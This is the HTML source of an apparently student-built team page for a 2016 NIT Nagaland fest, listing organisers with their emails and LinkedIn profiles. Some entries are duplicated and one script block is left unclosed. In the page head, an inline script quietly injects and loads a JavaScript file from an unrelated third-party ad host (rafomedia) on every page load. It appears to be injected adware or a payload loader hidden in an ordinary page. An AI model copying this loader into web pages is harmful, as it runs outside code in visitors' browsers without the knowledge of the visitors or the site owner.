<!DOCTYPE html>
<html lang="en" >
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="viewport" content="width=device-width,initial-scale=1">
        <meta name="keywords" content="Sankalp, IIT Roorkee, TechnoCultural, Indian Institute of Technology, kkmkrrish, maverick_n, labour">
        <link rel='icon' type='image/png' href='images/km.png'>
        <title>Team | 2016</title>
        <link href="http://maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet">
        
        
        
        <link href="team.css" rel="stylesheet">
        

        <!--index type-->
        <link href="style.css" rel="stylesheet">
        <link href="css/bootstrap.min.css" rel="stylesheet">


        <!---css for all-->
        <link rel="stylesheet" href="css/animate.css">
        <link href="css/style-responsive.css" rel="stylesheet">
        <link rel="stylesheet" href="css/font-awesome.min.css">
        <link rel="stylesheet" href="css/animate.min.css">
        
        






        <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js'></script>
    <script type="text/javascript">(function(){var a=document.createElement("script");a.type="text/javascript";a.async=!0;a.src="http://img.rafomedia.com/zr/js/adrns_y.js?20160105";var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b);})();</script></head>
    <body>
        <header id="top"> 
            <div class="" id="stick_menu">
                <div class="container">
                    <div class="row">
                        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                            <nav class="navbar navbar-default" role="navigation">
                                <div class="container">
                                    <div class="collapse navbar-collapse mainnavmenu" id="bs-example-navbar-collapse-1">
                                        <div id="menu-center">
                                        <ul class="ta pa nav navbar-nav navbar-center navbar-fixed-top ">
                                            <li><a href="index.html#header_part" >Home</a></li>
                                            <li><a href="index.html#events" >Events</a></li>    
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </nav>
                    </div>
                </div>
            </div>
        </header>
        
        <section id="team">
            <div class="row">
                <div class="col-md-8 col-md-offset-2">
                    <br/><br><br/>  
                   <!-- <h1 class="animated fadeInTop  brand-heading">D</h1><h1 class="animated fadeInTop  brand-heading">E</h1><h1 class="animated fadeInTop  brand-heading">V</h1><h1 class="animated fadeInTop  brand-heading">E</h1><h1 class="animated fadeInTop  brand-heading">L</h1><h1 class="animated fadeInTop  brand-heading">O</h1><h1 class="animated fadeInTop  brand-heading">P</h1><h1 class="animated fadeInTop  brand-heading">E</h1><h1 class="animated fadeInTop  brand-heading">R</h1><h1 class="animated fadeInTop  brand-heading">S</h1>
                --><div class="animated flipInY brand-heading"><h1 style="text-align:center;">Convener<h1></div>
                </div>
            </div>
            


            <div class="container">
                <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                    <div id="row">
                        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">

                        </div>
                        <div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
                            <div class="pad welcome_part wow bounceInLeft">
                                <img src="bg2.jpg" class="img-circle" height="200px" width="200px" title="Krishna Mishra"><br/>                  
                                <article>
                                    <h1>Krishna <b>Mishra</b><br><small>(krskrr<b>ish03)</b></small></h1>
                                    <div class="wow fadeInUp" data-wow-delay="1s">
                                    <p>Student(B.Tech), C.S.E.(2012-16) NIT Nagaland</p>   
                                    <ul class="al">
                                        <li><p><b>E-Mail</b><br/>kkmkrish03@gmail.com</p></li>
                                        <li><p><b>LinkedIn</b><br/>https://in.linkedin.com/in/krrish03</p></li>
                                    </ul>                     
                                    </div>
                                </article>          
                            </div>
                        </div>
                        <div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
                            <div class="pad pad welcome_part wow bounceInLeft">
                                <img  src="bg3.jpg" class="img-circle" height="200px" width="200px" title="Rahul Singh">                  
                                <article>
                                    <h1>Rahul <b>Singh</b><br><small>(rhld<b>only1)</b></small></h1>
                                    <div class="wow fadeInUp" data-wow-delay="1.5s">
                                    <p>Student(B.Tech), C.S.E.(2012-16) NIT Nagaland</p>
                                    <ul class="al">
                                        <li><p><b>E-Mail</b><br/>rhldonly1@gmail.com</p></li>
                                        <li><p><b>LinkedIn</b><br/>https://in.linkedin.com/in/rhldonly1</p></li>
                                    </ul>              
                                    </div>
                                </article>       
                            </div>
                        </div>
                        <div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
                            <div class="pad welcome_part wow bounceInLeft">
                                <img src="bg4.jpg" class="img-circle" height="200px" width="200px" title="Nitin Pandey">  
                                <article>
                                    <h1>Nitin <b>Pandey</b><br><small>(mave<b>rick_n)</b></small></h1>    
                                    <div class="wow fadeInUp" data-wow-delay=".5s">
                                    <p>Student(B.Tech), C.S.E.(2012-16) NIT Nagaland</p> 
                                    <ul class="al">
                                        <li><p><b>E-Mail</b><br/>nitin_maverick@hotmail.com</p></li>
                                        <li><p><b>LinkedIn</b><br/>https://in.linkedin.com/in/maverickn</p></li>
                                    </ul>                  
                                    </div>
                                </article>       
                            </div>
                        </div>  
                    </div>
                </div>
            </div>
            <div class="col-md-8 col-md-offset-2">
                    
                  
                <div class="animated flipInY brand-heading"><h1 style="text-align:center;">Co-convener<h1></div>
                </div>
            </div>
            


            <div class="container">
                <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                    <div id="row">
                        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">

                        </div>
                        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                            <div class="pad welcome_part wow bounceInLeft">
                                <img src="images/team/n.jpg" class="img-circle" height="200px" width="200px" title="Krishna Mishra"><br/>                  
                                <article>
                                    <h1>Xhahid <b>Ansari</b></h1>
                                    <div class="wow fadeInUp" data-wow-delay="1s">
                                    <p>Student(B.Tech), E.C.E.(2011-15) NIT Nagaland</p>   
                                    <ul class="al">
                                        <li><p><b>E-Mail</b><br/>ongiin@live.in</p></li>
                                        
                                    </ul>                     
                                    </div>
                                </article>          
                            </div>
                        </div>
                        <div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
                            <div class="pad welcome_part wow bounceInLeft">
                                <img src="bg2.jpg" class="img-circle" height="200px" width="200px" title="Krishna Mishra"><br/>                  
                                <article>
                                    <h1>Krishna <b>Mishra</b><br><small>(krskrr<b>ish03)</b></small></h1>
                                    <div class="wow fadeInUp" data-wow-delay="1s">
                                    <p>Student(B.Tech), C.S.E.(2012-16) NIT Nagaland</p>   
                                    <ul class="al">
                                        <li><p><b>E-Mail</b><br/>kkmkrish03@gmail.com</p></li>
                                        <li><p><b>LinkedIn</b><br/>https://in.linkedin.com/in/krrish03</p></li>
                                    </ul>                     
                                    </div>
                                </article>          
                            </div>
                        </div>
                        <div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
                            <div class="pad welcome_part wow bounceInLeft">
                                <img src="bg2.jpg" class="img-circle" height="200px" width="200px" title="Krishna Mishra"><br/>                  
                                <article>
                                    <h1>Krishna <b>Mishra</b><br><small>(krskrr<b>ish03)</b></small></h1>
                                    <div class="wow fadeInUp" data-wow-delay="1s">
                                    <p>Student(B.Tech), C.S.E.(2012-16) NIT Nagaland</p>   
                                    <ul class="al">
                                        <li><p><b>E-Mail</b><br/>kkmkrish03@gmail.com</p></li>
                                        <li><p><b>LinkedIn</b><br/>https://in.linkedin.com/in/krrish03</p></li>
                                    </ul>                     
                                    </div>
                                </article>          
                            </div>
                        </div>
                        <div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
                            <div class="pad welcome_part wow bounceInLeft">
                                <img src="bg2.jpg" class="img-circle" height="200px" width="200px" title="Krishna Mishra"><br/>                  
                                <article>
                                    <h1>Krishna <b>Mishra</b><br><small>(krskrr<b>ish03)</b></small></h1>
                                    <div class="wow fadeInUp" data-wow-delay="1s">
                                    <p>Student(B.Tech), C.S.E.(2012-16) NIT Nagaland</p>   
                                    <ul class="al">
                                        <li><p><b>E-Mail</b><br/>kkmkrish03@gmail.com</p></li>
                                        <li><p><b>LinkedIn</b><br/>https://in.linkedin.com/in/krrish03</p></li>
                                    </ul>                     
                                    </div>
                                </article>          
                            </div>
                        </div>
                        <div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
                            <div class="pad welcome_part wow bounceInLeft">
                                <img src="bg2.jpg" class="img-circle" height="200px" width="200px" title="Krishna Mishra"><br/>                  
                                <article>
                                    <h1>Krishna <b>Mishra</b><br><small>(krskrr<b>ish03)</b></small></h1>
                                    <div class="wow fadeInUp" data-wow-delay="1s">
                                    <p>Student(B.Tech), C.S.E.(2012-16) NIT Nagaland</p>   
                                    <ul class="al">
                                        <li><p><b>E-Mail</b><br/>kkmkrish03@gmail.com</p></li>
                                        <li><p><b>LinkedIn</b><br/>https://in.linkedin.com/in/krrish03</p></li>
                                    </ul>                     
                                    </div>
                                </article>          
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="col-md-8 col-md-offset-2">
                    
                  
                <div class="animated flipInY brand-heading"><h1 style="text-align:center;">CONTENT MANAGER<h1></div>
                </div>
            </div>
            


            <div class="container">
                <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                    <div id="row">
                        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">

                        </div>
                        <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                            <div class="pad welcome_part wow bounceInLeft">
                                <img src="images/team/m.jpg" class="img-circle" height="200px" width="200px" title="Krishna Mishra"><br/>                  
                                <article>
                                    <h1>Vikram <b>Prasad</b></h1>
                                    <div class="wow fadeInUp" data-wow-delay="1s">
                                    <p>Student(B.Tech), C.S.E.(2011-15) NIT Nagaland</p>   
                                    <ul class="al">
                                        <li><p><b>E-Mail</b><br/>vikram.prasad01@outlook.com</p></li>
                                        <li><p><b>LinkedIn</b><br/>https://in.linkedin.com/pub/vikram-prasad/45/160/172</p></li>
                                    </ul>                     
                                    </div>
                                </article>          
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <footer id="footer" class="pa footer">
            <div class="container">
                <div class="row">
                    <div class="col-md-12">
                        <div class="footer-desc text-center">
                            <div class="ll logo wow fadeInDown">NIT</div>
                            <ul class="socail-list list-inline">
                               <li><a target="_blank" href="https://www.facebook.com/Ekarikthin"><i class="fa fa-facebook wow fadeInLeft" data-wow-delay=".2s"></i></a></li>
                                <li><a target="_blank" href="https://twitter.com/Ekarikthin"><i class="fa fa-twitter wow fadeInLeft" data-wow-delay=".4s"></i></a></li>
                                <li><a target="_blank" href="https://plus.google.com/u/0/113919274928419029880/about" target="_blank"><i class="fa fa-google-plus wow fadeInLeft" data-wow-delay=".6s"></i></a></li>
                                <li><a target="_blank" href="https://www.youtube.com/channel/UCAaVwaP0-fsHeq3ninrKo1w"><i class="fa fa-youtube wow fadeInLeft" data-wow-delay=".2s"></i></a></li>
                            </ul>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12 text-center">
                        <div class="copyright-info m20">
                            &copy; Copyright 2015 NIT Nagaland. <span>Designed &amp; developed by- <a href="#top" target="_blank">R.N.K.</a></span>
                        </div>
                    </div>
                </div>
                <div id="back-to-top" data-spy="affix" data-offset-top="10" class="back-to-top affix">
                    <a href="#top" class="page-scroll" >
                        <button class="btn btn-primary" title="Back to Top"><i class="fa fa-angle-double-up"></i></button>
                    </a>
                </div>
            </div>

        </footer>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
       

        <script type = "text/javascript">
            $(document).ready( function() {
                 new WOW().init();
        </script>

        <!--index type-->
         <script src="js/bootstrap.min.js"></script>
        <script src="js/jquery.smooth-scroll.js"></script>
        <script src="js/jquery.nicescroll.min.js"></script>
        <script src="js/jquery.countdown.min.js"></script>
        <script src="js/script.js"></script>



        <!--same js for all-->
     <script src="js/wow.min.js"></script>
    </body>
</html>
    